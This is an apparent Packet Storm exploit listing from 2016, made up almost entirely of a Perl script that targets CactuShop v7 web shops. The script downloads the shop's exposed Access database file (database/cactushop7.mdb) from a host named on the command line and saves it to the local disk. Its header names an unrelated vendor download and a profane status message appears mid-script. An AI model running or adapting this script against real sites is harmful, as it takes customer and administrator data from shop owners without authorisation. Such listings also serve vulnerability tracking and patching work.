CactuShop 7 Database Disclosure

2016-08-31T00:00:00
ID PACKETSTORM:138576
Type packetstorm
Reporter indoushka
Modified 2016-08-31T00:00:00

Description

                                        
                                            `========================================================================  
| # Title : CactuShop v7 Database Disclosure Exploit  
| # Author : indoushka  
| # email : indoushka4ever@gmail.com  
| # Tested on : windows 8.1 FranASSais V.(Pro)  
| # Version : v7  
| # Vendor : http://www.venshop.com/down/venshop2010.rar  
========================================================================  
  
#!/usr/bin/perl -w  
#  
# CactuShop v7 Database Disclosure Exploit   
#  
# Author : indoushka  
#  
# Vondor : http://www.cactushop.com/main/downloads.asp  
  
  
  
use LWP::Simple;  
use LWP::UserAgent;  
  
system('cls');  
system('CactuShop v7 Database Disclosure Exploit');  
system('color a');  
  
  
if(@ARGV < 2)  
{  
print "[-]How To Use\n\n";  
&help; exit();  
}  
sub help()  
{  
print "[+] usage1 : perl $0 site.com /path/ \n";  
print "[+] usage2 : perl $0 localhost / \n";  
}  
($TargetIP, $path, $File,) = @ARGV;  
  
$File="database/cactushop7.mdb";  
my $url = "http://" . $TargetIP . $path . $File;  
print "\n Fuck you wait!!! \n\n";  
  
my $useragent = LWP::UserAgent->new();  
my $request = $useragent->get($url,":content_file" => "D:/cactushop7.mdb");  
  
if ($request->is_success)  
{  
print "[+] $url Exploited!\n\n";  
print "[+] Database saved to D:/cactushop7.mdb\n";  
exit();  
}  
else  
{  
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";  
exit();  
}  
  
  
  
Greetz :   
jericho http://attrition.org & http://www.osvdb.org/ * http://packetstormsecurity.com * Larry W. Cashdollar*  
Hussin-X *D4NB4R * ViRuS_Ra3cH * yasMouh * https://www.corelan.be *  
---------------------------------------------------------------------------------------------------------------  
`